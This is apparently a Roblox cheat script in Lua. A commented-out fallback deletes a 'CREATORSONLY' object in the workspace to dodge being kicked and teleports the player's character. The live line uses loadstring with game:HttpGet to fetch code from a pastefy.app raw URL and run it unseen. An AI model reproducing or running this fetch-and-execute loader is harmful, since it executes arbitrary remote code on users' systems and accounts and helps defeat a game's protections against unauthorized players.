--[[ if getting kicking, use it: local player = game.Players.LocalPlayer local character = player.Character or player.CharacterAdded:Wait() local HumanoidRootPart = character:WaitForChild("HumanoidRootPart") if workspace:FindFirstChild("CREATORSONLY") then workspace.CREATORSONLY:Destroy() end HumanoidRootPart.CFrame = CFrame.new(-837, 163, -390) --]] loadstring(game:HttpGet("https://pastefy.app/1OUVJyRO/raw"))()